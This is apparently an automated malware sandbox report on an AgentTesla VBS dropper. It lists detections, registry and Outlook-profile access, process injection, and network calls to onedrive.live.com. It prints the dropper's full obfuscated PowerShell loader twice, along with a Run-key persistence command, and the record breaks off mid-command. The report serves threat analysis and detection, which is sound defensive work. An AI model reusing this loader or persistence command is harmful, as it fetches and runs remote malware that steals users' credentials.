Analysis Overview
SHA256
e1c9b3850958c21be6108aa28a28f7b8f059a0530db99c587fadef7801fa4319
Threat Level: Known bad
The file e1c9b3850958c21be6108aa28a28f7b8f059a0530db99c587fadef7801fa4319.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
outlook_office_path
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_win_path
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-05 15:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-05 15:12
Reported
2024-06-05 15:14
Platform
win7-20240221-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1592 wrote to memory of 2188 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1592 wrote to memory of 2188 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1592 wrote to memory of 2188 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 2936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2188 wrote to memory of 2936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2188 wrote to memory of 2936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e1c9b3850958c21be6108aa28a28f7b8f059a0530db99c587fadef7801fa4319.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enriched = 1;Function undinens($Kommanderede){$Vejoverskringensndregulering=$Kommanderede.Length-$Enriched;$Unsublimed='Substring';For( $Vejoverskringens=5;$Vejoverskringens -lt $Vejoverskringensndregulering;$Vejoverskringens+=6){$Tatovren+=$Kommanderede.$Unsublimed.Invoke( $Vejoverskringens, $Enriched);}$Tatovren;}function Silkworks($Jordfyldens){ . ($Capriccettos) ($Jordfyldens);}$Brevteksten=undinens 'ProcrMbarbeo.ypotz VagaiR.vallEmbuslNo,itaForeb/ Durb5Hyp,r. Afdr0Prgn opody( H,nvWGoalei MalinVarekdS,mploS ovlw CetasTiltu OkkupN Pa,tTpu lm A.skr1danie0 Tris.Stads0Disbe; Tig. DroolWgeneriviewpnAs.hy6 Bram4Rigsa;,uccu NonvxXenop6 Erhv4Geant; T ta .ttterEksprvPo,en: Xiph1Gues 2 Funk1 Unhi.Repoi0K ist)Vatic RegneGCiv.le Thumc Tr,nkAssesoEngra/,deka2Reeve0Exant1Broc.0A lvn0Anorm1Hyd o0Trust1bu dl Regn.FSkri.iUric.rVese,eKu.vefImprooTankax Vine/ .ice1Tita.2 F,re1 Mode. Lekt0s rob ';$Outlast=undinens 'S.udeUGe.mes Bid eCash.rMaski-Lisb Ab komgReolpeOrdrenCen stIndkb ';$Skrmformularer=undinens 'Non nhFol,et rustt SpurpChowdsSlagt:La,er/F,rti/LaaneoReexhnHaa.deBegynd Iso rPrecaiB.girvProdie afvi.agterl PrusiAf,alvUnblie unte. intacHistoowineymApote/ ,aledD.naio Li.iwConfan BopllEpithoChampaOverrdMetap?Sto.vrKe,eseAlib.sLs eriAllehdBr,de=Usand1Cavi,FAfsluDfinanFForov2Socia0 Chlo5DuctuB S edBDistoDHotel5StnksFIsbry9.ermoF Godk5 Lacc%Natio2Untru1Arumu2Local5Kompl6Son e6Proco&MisgoaScu.uuHerb,tIntorhMininkResknePilloySkill=uddel!BremsA hoveF Va egIn.dk0I,nerNAnteccSimseS AarsNHaan 1Bedron IllaO itrotArteroPodzo5Sag.bcRitua ';$Servitutheftede=undinens ' Bema> ,rst ';$Capriccettos=undinens 'ReguiirefleeOuistxH,mot ';$Tenures='opskriv';$Autokraternes = undinens 'Filame M rvcTuberhBrusqoNeoza Safin%Frot.a KakipChoirpKasmid bawlaTekstteva,uaReans%skr,p\PartiCAdm,re OvernMusi.tKvadrr UbesoU,opoiJarlddLsb,a.GidegAD casrAr ejbBelnn Fodga&Dag n&,choc Tyroge GamicLejeah MarkoForfa alamtB,gge ';Silkworks (undinens 'swerd$AntiggResealTitalointerbTr giaMilitl Phys:eternF leabiBrinklConveiRememgD karrAfmataPard,ndesse=Waggo(SejlrcSkrifmBeeswdDdlk Synd/S,opfc Pr g Recri$Aegi ASamm uDisketRendeo mirak,nterrT,iuna F,ugtSesque DesprSytjenatomieSkandsDenat)Forar ');Silkworks (undinens 'Loise$lifergHuldslHunnioKnbe,bSmlehaSerislspild:VarsoGOffene Unq n NonteOutdirDumstaBe,fil LinniFagblz Sk.vaTelesbP enoiOstrelZ,gomiMarcitUndery Blya=Koje,$SlyngSToxoskAttesr BekemKombifPljniosubanr.epermYde,gu Prytloverla.valur SrineUtopirLandb.Svejss BrnepKr.dilfringic,pryt,aloc(Kl,en$ poinSPolyae flberGalopvShe,tiBundotSkiftuO scotShivehhypoaeDrivvfUrugutSkibieSnitcdTakine tros)Fryse ');$Skrmformularer=$Generalizability[0];$Fribblers107= (undinens 'fje l$ Quadg FrellKry boPrisobdispoaSprnglStrab:HyperST ggeeCarbonGamays ,ecoo,rmgarKarneeInvesr Bioen KlodeBlodt=MekanNKneeheCumbewAer.b-SubtuOKnfalbKaffejAb.ike,uttecPaschtSger. Sv.ghSScenayAnvensNav etkoldkeFurolmAgist.OkkupN Bence Lwoktneom,. OpskWKlatveFemdobFremdCUnsublAnisoi EvigeBlindn eplt');$Fribblers107+=$Filigran[1];Silkworks ($Fribblers107);Silkworks (undinens 'P.oto$,ammoSVict,eDimernbrndessk,ksoAnt,prUntroeTransrThro.nNarreeBadul. NonrH edake ,ysaaAntiodHjemmePtysmrConvesRimel[Shimp$SpartO D spuDuodetIntrolRocceaTelevs Tasstoffer]C.nvi=Frems$ CliqBGreasrmargee IncivInkjet C,oseFlskek GnocsTeleft VulpeJenomn Bade ');$Privilegiesystem=undinens 'Navle$UntilSBesmreSvesknTautosGlamoo ,moerBesl e Str,rVarienHvelsePer s.OversD Sul,oEvillwEst nnTrusslAcc,io fetaaAc.iddupfliF D esiOphrslTilfleda.ii(Anath$ ,ncoSSkppekApostr sphamtilskf DrosoVej.brPi atmReautu,redvlOverraH,nharIdenteD,merr.atio, Outb$SadelLHelgaoDumpec ToilaisocolDegeni ,itrzyab,yeSolonsSkjor)Rewid ';$Localizes=$Filigran[0];Silkworks (undinens 'relat$ScammgskarplUnderoBrandbSwiviaNilomlJanet:.laadFArme.o .attr elvmsAfsenoNichonBli.kiHorsen.eftegFaksieP rsonVertisChola=Assoc(UnrolTRappeeSkrnesSkal,tThorg-StrafPKiteda.araltudvikhTa,df Venst$ RhymLSphygocollecByw,laDefrolAffaliExpedz SteneC,codsCrawf)befal ');while (!$Forsoningens) {Silkworks (undinens ' Fois$SubmugOmbrylund,ko yewobPropoaTaarelBalti:NoncoF BarngN.ikatSailceDutchm AttaeDecims Da,otK.tteemacrorLslod= Penr$ NongtPhytorAltisudisoxeHovn ') ;Silkworks $Privilegiesystem;Silkworks (undinens 'MochaSEx ret Pe,aaSincerEncultLan,o-A.iatSNaadel axaeCon reTron pA,red Demar4Qua r ');Silkworks (undinens 'Hors.$CarbogTilbalDominocre tbMoorua,nsnal,otel:SekstFAuditoSp.acrT,ymos,tjpuoLu thn SeksilangrnAnf.egTi,dieSaetnnCatc,sDdsd.=opdag(lovm.T pstieA.ghas R ngt Aero- he ePMyz.saPov,lt TilshTatov Ferr.$helseLUdvejo GordcUndfaaIsbl,lB,rgiiGi.bozLabore,ubsssud.an)Vials ') ;Silkworks (undinens 'Noasu$Microg Predl vil o CentbStofhaCsareltempe:conteS olute Ha,imi aliiConsoeFiskencartogSlanda UlykgUovere Keynd Fini=Re.is$ PseugBevbnl h teoMisexbQuinqa Du,llbrdre:Disr M tnkeiTvivls .empaSav,lpEukarpansgnlFjel,i Sp,reBort,sflske+Rota.+,palt% Blub$SkovaGKundeeTransn F ree xagrSup,ra nhabl PriniUnintzAggrea IsohbSpil.iLovinlSvineiCutlitTestmy orma. Har.crapruoCallguN.bronElapst Papa ') ;$Skrmformularer=$Generalizability[$Semiengaged];}$Splitflagene18=294026;$Dasyurid=28720;Silkworks (undinens ' Bely$skolegDytt,lBehavo Bla b FamiaVouchl elet: ,utgTOpholi.ocielcheert DekaaAggellRaakreTurner UncosFrans ,rst=Radio DismoGCaps eSul,ut Alch-Ti.diCSl tloAuerbnH nortEn.ste,jemunHali.tTopfo Inter$Fl.ttLBesnaoLiparcSkuldaDee wlGrundiHjertzsmatte,ahitsCalvi ');Silkworks (undinens 'bisku$DrivrgTryktl UnstoFjerdbReklaaSporelRadbu:WildwIBar,enMarskt obbe passrS,ratnKonveaLevitt U,sviMaudlo,kovsnMus eaBit,elExoe,s Pern Vimp=apoph Pepos[ teroSHeaveyFidussfremft Gla,eYentnmKn,ld.Paon CrinkeoretronFuch,vE.fekeMolesrAf pnt Forh] hot: Sema:nazi.FJor,orKugleoPovelmKogevB Relea Epi.sScissePods,6Phill4Stvl.S Pr.st Platr SjleiGtem.nEksiggIndol(Spill$Plat T.oncliUnanalSubmatStivnaArv klJunnie AmnerKonfesCapit)Lugni ');Silkworks (undinens ' dias$S andg DroglM,sseoC entb ikra,oatmlAkt,t:Eks.rCTorstaSkak tDoleraU,snipDensihBaadey Uns.l TchalApp.aaF.rhrrAfkrvy .ean Filt= frop Nonco[KoksjSAfbe.yTr.pasUds.ytHolyse .urrmUrteg.VelseT Desiet,ldexDenu,tsided.TilsiE Helhn .ljlc BandoChir dUrbaniRegisnGrinnglogwa]Fetia:Ampli: SkueA orsuSpropoC El cIIn ynITynds.Theo GShaheeJinket refuS.melttEpicorChas.i celdn.uleggOv.rp(Subtl$ ScytIHvidenZostetHumane.urghrGetaenKysteaModert Pr,eiFrostoCentrnX.logaHaandlCal ssApp r)Af ol ');Silkworks (undinens 'Putz.$Psy,hgSensilXyl to PirabStat.aSkomalBefra:P eobPReforhMoer oInfo.sIon.sp fedth ftneoCalamrErigeyDragalNeotea.ormltUafgjiYisflnQu.ckg E,em1Mos u0 Sten6 fspn=Uvsen$SignaC veraD.strtSyn.eaNattep OverhInteryAbsenl C,unlD.abeaInterrPar,eyPo tl.KolkhsBilliuSystebRehonsScummtEfterr Unmoi,rundn R mpgDestr(,ngul$Udv kSClimapForcil FedeiS,ivetRu,rifSvlgkl.rflaaNonubg u,deeKadetn TekneVolds1Skyro8 Forh,Gn st$ ta.lDProklaMid,esfa,mey .lenuSkarrrMountiLva udBeton)Sa,co ');Silkworks $Phosphorylating106;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Centroid.Arb && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
Files
memory/2188-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp
memory/2188-5-0x000000001B260000-0x000000001B542000-memory.dmp
memory/2188-6-0x00000000024E0000-0x00000000024E8000-memory.dmp
memory/2188-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-8-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-11-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-12-0x000007FEF561E000-0x000007FEF561F000-memory.dmp
memory/2188-13-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-14-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-15-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-05 15:12
Reported
2024-06-05 15:14
Platform
win10v2004-20240508-en
Max time kernel
141s
Max time network
137s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\merrows = "%Creepingly35% -w 1 $Polydactylous=(Get-ItemProperty -Path 'HKCU:\\Decarbonylate\\').Krydsrevidcrr;%Creepingly35% ($Polydactylous)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3076 set thread context of 4796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e1c9b3850958c21be6108aa28a28f7b8f059a0530db99c587fadef7801fa4319.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enriched = 1;Function undinens($Kommanderede){$Vejoverskringensndregulering=$Kommanderede.Length-$Enriched;$Unsublimed='Substring';For( $Vejoverskringens=5;$Vejoverskringens -lt $Vejoverskringensndregulering;$Vejoverskringens+=6){$Tatovren+=$Kommanderede.$Unsublimed.Invoke( $Vejoverskringens, $Enriched);}$Tatovren;}function Silkworks($Jordfyldens){ . ($Capriccettos) ($Jordfyldens);}$Brevteksten=undinens 'ProcrMbarbeo.ypotz VagaiR.vallEmbuslNo,itaForeb/ Durb5Hyp,r. Afdr0Prgn opody( H,nvWGoalei MalinVarekdS,mploS ovlw CetasTiltu OkkupN Pa,tTpu lm A.skr1danie0 Tris.Stads0Disbe; Tig. DroolWgeneriviewpnAs.hy6 Bram4Rigsa;,uccu NonvxXenop6 Erhv4Geant; T ta .ttterEksprvPo,en: Xiph1Gues 2 Funk1 Unhi.Repoi0K ist)Vatic RegneGCiv.le Thumc Tr,nkAssesoEngra/,deka2Reeve0Exant1Broc.0A lvn0Anorm1Hyd o0Trust1bu dl Regn.FSkri.iUric.rVese,eKu.vefImprooTankax Vine/ .ice1Tita.2 F,re1 Mode. Lekt0s rob ';$Outlast=undinens 'S.udeUGe.mes Bid eCash.rMaski-Lisb Ab komgReolpeOrdrenCen stIndkb ';$Skrmformularer=undinens 'Non nhFol,et rustt SpurpChowdsSlagt:La,er/F,rti/LaaneoReexhnHaa.deBegynd Iso rPrecaiB.girvProdie afvi.agterl PrusiAf,alvUnblie unte. intacHistoowineymApote/ ,aledD.naio Li.iwConfan BopllEpithoChampaOverrdMetap?Sto.vrKe,eseAlib.sLs eriAllehdBr,de=Usand1Cavi,FAfsluDfinanFForov2Socia0 Chlo5DuctuB S edBDistoDHotel5StnksFIsbry9.ermoF Godk5 Lacc%Natio2Untru1Arumu2Local5Kompl6Son e6Proco&MisgoaScu.uuHerb,tIntorhMininkResknePilloySkill=uddel!BremsA hoveF Va egIn.dk0I,nerNAnteccSimseS AarsNHaan 1Bedron IllaO itrotArteroPodzo5Sag.bcRitua ';$Servitutheftede=undinens ' Bema> ,rst ';$Capriccettos=undinens 'ReguiirefleeOuistxH,mot ';$Tenures='opskriv';$Autokraternes = undinens 'Filame M rvcTuberhBrusqoNeoza Safin%Frot.a KakipChoirpKasmid bawlaTekstteva,uaReans%skr,p\PartiCAdm,re OvernMusi.tKvadrr UbesoU,opoiJarlddLsb,a.GidegAD casrAr ejbBelnn Fodga&Dag n&,choc Tyroge GamicLejeah MarkoForfa alamtB,gge ';Silkworks (undinens 'swerd$AntiggResealTitalointerbTr giaMilitl Phys:eternF leabiBrinklConveiRememgD karrAfmataPard,ndesse=Waggo(SejlrcSkrifmBeeswdDdlk Synd/S,opfc Pr g Recri$Aegi ASamm uDisketRendeo mirak,nterrT,iuna F,ugtSesque DesprSytjenatomieSkandsDenat)Forar ');Silkworks (undinens 'Loise$lifergHuldslHunnioKnbe,bSmlehaSerislspild:VarsoGOffene Unq n NonteOutdirDumstaBe,fil LinniFagblz Sk.vaTelesbP enoiOstrelZ,gomiMarcitUndery Blya=Koje,$SlyngSToxoskAttesr BekemKombifPljniosubanr.epermYde,gu Prytloverla.valur SrineUtopirLandb.Svejss BrnepKr.dilfringic,pryt,aloc(Kl,en$ poinSPolyae flberGalopvShe,tiBundotSkiftuO scotShivehhypoaeDrivvfUrugutSkibieSnitcdTakine tros)Fryse ');$Skrmformularer=$Generalizability[0];$Fribblers107= (undinens 'fje l$ Quadg FrellKry boPrisobdispoaSprnglStrab:HyperST ggeeCarbonGamays ,ecoo,rmgarKarneeInvesr Bioen KlodeBlodt=MekanNKneeheCumbewAer.b-SubtuOKnfalbKaffejAb.ike,uttecPaschtSger. Sv.ghSScenayAnvensNav etkoldkeFurolmAgist.OkkupN Bence Lwoktneom,. OpskWKlatveFemdobFremdCUnsublAnisoi EvigeBlindn eplt');$Fribblers107+=$Filigran[1];Silkworks ($Fribblers107);Silkworks (undinens 'P.oto$,ammoSVict,eDimernbrndessk,ksoAnt,prUntroeTransrThro.nNarreeBadul. NonrH edake ,ysaaAntiodHjemmePtysmrConvesRimel[Shimp$SpartO D spuDuodetIntrolRocceaTelevs Tasstoffer]C.nvi=Frems$ CliqBGreasrmargee IncivInkjet C,oseFlskek GnocsTeleft VulpeJenomn Bade ');$Privilegiesystem=undinens 'Navle$UntilSBesmreSvesknTautosGlamoo ,moerBesl e Str,rVarienHvelsePer s.OversD Sul,oEvillwEst nnTrusslAcc,io fetaaAc.iddupfliF D esiOphrslTilfleda.ii(Anath$ ,ncoSSkppekApostr sphamtilskf DrosoVej.brPi atmReautu,redvlOverraH,nharIdenteD,merr.atio, Outb$SadelLHelgaoDumpec ToilaisocolDegeni ,itrzyab,yeSolonsSkjor)Rewid ';$Localizes=$Filigran[0];Silkworks (undinens 'relat$ScammgskarplUnderoBrandbSwiviaNilomlJanet:.laadFArme.o .attr elvmsAfsenoNichonBli.kiHorsen.eftegFaksieP rsonVertisChola=Assoc(UnrolTRappeeSkrnesSkal,tThorg-StrafPKiteda.araltudvikhTa,df Venst$ RhymLSphygocollecByw,laDefrolAffaliExpedz SteneC,codsCrawf)befal ');while (!$Forsoningens) {Silkworks (undinens ' Fois$SubmugOmbrylund,ko yewobPropoaTaarelBalti:NoncoF BarngN.ikatSailceDutchm AttaeDecims Da,otK.tteemacrorLslod= Penr$ NongtPhytorAltisudisoxeHovn ') ;Silkworks $Privilegiesystem;Silkworks (undinens 'MochaSEx ret Pe,aaSincerEncultLan,o-A.iatSNaadel axaeCon reTron pA,red Demar4Qua r ');Silkworks (undinens 'Hors.$CarbogTilbalDominocre tbMoorua,nsnal,otel:SekstFAuditoSp.acrT,ymos,tjpuoLu thn SeksilangrnAnf.egTi,dieSaetnnCatc,sDdsd.=opdag(lovm.T pstieA.ghas R ngt Aero- he ePMyz.saPov,lt TilshTatov Ferr.$helseLUdvejo GordcUndfaaIsbl,lB,rgiiGi.bozLabore,ubsssud.an)Vials ') ;Silkworks (undinens 'Noasu$Microg Predl vil o CentbStofhaCsareltempe:conteS olute Ha,imi aliiConsoeFiskencartogSlanda UlykgUovere Keynd Fini=Re.is$ PseugBevbnl h teoMisexbQuinqa Du,llbrdre:Disr M tnkeiTvivls .empaSav,lpEukarpansgnlFjel,i Sp,reBort,sflske+Rota.+,palt% Blub$SkovaGKundeeTransn F ree xagrSup,ra nhabl PriniUnintzAggrea IsohbSpil.iLovinlSvineiCutlitTestmy orma. Har.crapruoCallguN.bronElapst Papa ') ;$Skrmformularer=$Generalizability[$Semiengaged];}$Splitflagene18=294026;$Dasyurid=28720;Silkworks (undinens ' Bely$skolegDytt,lBehavo Bla b FamiaVouchl elet: ,utgTOpholi.ocielcheert DekaaAggellRaakreTurner UncosFrans ,rst=Radio DismoGCaps eSul,ut Alch-Ti.diCSl tloAuerbnH nortEn.ste,jemunHali.tTopfo Inter$Fl.ttLBesnaoLiparcSkuldaDee wlGrundiHjertzsmatte,ahitsCalvi ');Silkworks (undinens 'bisku$DrivrgTryktl UnstoFjerdbReklaaSporelRadbu:WildwIBar,enMarskt obbe passrS,ratnKonveaLevitt U,sviMaudlo,kovsnMus eaBit,elExoe,s Pern Vimp=apoph Pepos[ teroSHeaveyFidussfremft Gla,eYentnmKn,ld.Paon CrinkeoretronFuch,vE.fekeMolesrAf pnt Forh] hot: Sema:nazi.FJor,orKugleoPovelmKogevB Relea Epi.sScissePods,6Phill4Stvl.S Pr.st Platr SjleiGtem.nEksiggIndol(Spill$Plat T.oncliUnanalSubmatStivnaArv klJunnie AmnerKonfesCapit)Lugni ');Silkworks (undinens ' dias$S andg DroglM,sseoC entb ikra,oatmlAkt,t:Eks.rCTorstaSkak tDoleraU,snipDensihBaadey Uns.l TchalApp.aaF.rhrrAfkrvy .ean Filt= 